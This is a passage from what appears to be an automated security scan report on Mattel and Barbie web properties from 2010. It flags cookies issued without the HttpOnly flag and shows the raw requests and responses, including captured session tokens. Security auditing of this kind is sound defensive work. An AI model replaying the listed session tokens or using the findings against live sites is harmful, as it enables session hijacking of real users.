Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: https://shop.mattel.com/coreg/index.jsp?step=register
Set-Cookie: JSESSIONID=6BhgNSJLtGv2pTRm0wdSQBcrGXQYDXK4wBgNtqrM8p1yzPSGsSxQ!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:46 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 301

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/coreg/inde
...[SNIP]...

4.10. https://shop.mattel.com/search/controller.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:17 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp?sr=1
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 279

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/home/index.
...[SNIP]...

4.11. https://shop.mattel.com/shop/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:09 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/shop/index.jsp
Set-Cookie: JSESSIONID=3TH2NSJJTJj8m1BvPfFTBxtL3MKxHh419LByYsPnhhJ5gPWKVpSR!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/shop/index.
...[SNIP]...

4.12. https://shop.mattel.com/storeLocator/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storeLocator/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vR51NSJGT4MQyLVFJyxv053tGlfQRVQKCq4gRLT2H1XhFhRhzJRJ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41070


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

4.13. http://tracking.searchmarketing.com/gsic_welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /gsic_welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gsic_welcome.asp?SMCID=1983&x=http%3A//www.barbie.com/videogirl/ HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=3cf273a3%2D1e33%2D4fb3%2Db7d3%2Df656fd5ae794&AID=&LastVisitDate=12%2F15%2F2010+5%3A42%3A12+PM&SMCID=2066

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQDAABCA=KMEDNHEBKHLACOOPCOCPKBFK; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

4.14. http://videogirlcontest.barbie.com/display_page  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videogirlcontest.barbie.com
Path:   /display_page

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display_page?page=gallery HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.2.10.1293083893

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Wed, 22 Dec 2010 23:59:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 22 Dec 2010 23:59:35 GMT
Connection: close
Set-Cookie: session=4d1290e773c604af; path=/; expires=Thu, 23-Dec-2010 00:29:35 GMT
Content-Length: 6508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Barbi
...[SNIP]...

4.15. http://videogirlcontest.barbie.com/get_contest_entries  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videogirlcontest.barbie.com
Path:   /get_contest_entries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /get_contest_entries HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Content-Length: 121

xml=1&count=5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=3&page=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 2013
Content-Type: text/xml; charset=utf-8
Cache-Control: public, max-age=300
Expires: Thu, 23 Dec 2010 00:04:37 GMT
Date: Wed, 22 Dec 2010 23:59:37 GMT
Connection: close
Set-Cookie: session=4d1290e9056bf834; path=/; expires=Thu, 23-Dec-2010 00:29:37 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<gallery cid="p1core-tbx09.f.1800/af61f/6f1/e3e0e165.d273297883881bf94d107a8fb5d498d8">

<categories>
<item data="" label="All Categories" sele
...[SNIP]...

4.16. http://videogirlcontest.barbie.com/get_entry  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videogirlcontest.barbie.com
Path:   /get_entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /get_entry?id=38;format=thumb HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://akamai.eprizecdn.net/mattel/barbie/live/27880E68-ED1A-11DF-88F2-44242484E103_0000.png
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 22 Dec 2010 23:59:37 GMT
Content-Length: 0
Content-Type: image/png
Date: Wed, 22 Dec 2010 23:59:37 GMT
Connection: close
Set-Cookie: session=4d1290e9ed7fa8ae; path=/; expires=Thu, 23-Dec-2010 00:29:37 GMT


4.17. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035471&rn=1820125381&c7=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c4=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c8=Video%20Girl%20-%20Home%20-%20Barbie.com&c9=http%3A%2F%2Fvideogirlcontest.barbie.com%2Fpublic%2Fmedia%2FBarbieGalleryVote_safe.swf&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cb1dc5-204.0.5.41-1286583196

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 23 Dec 2010 00:01:10 GMT
Connection: close
Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Sat, 22-Dec-2012 00:01:10 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


4.18. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=2287&browse_products=4199678 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1293062958_1293062958683:9494125139666732; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 23 Dec 2010 00:09:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

4.19. http://shop.mattel.com/category/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35853


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...

4.20. http://shop.mattel.com/family/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /family/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:30 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:37 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...

4.21. http://shop.mattel.com/history/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /history/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /history/index.jsp?ruvClear=yes HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e1804; expires=Tuesday, 10-Jan-2079 03:29:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/home/index.
...[SNIP]...

4.22. http://shop.mattel.com/product/wishlist/wishlist.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

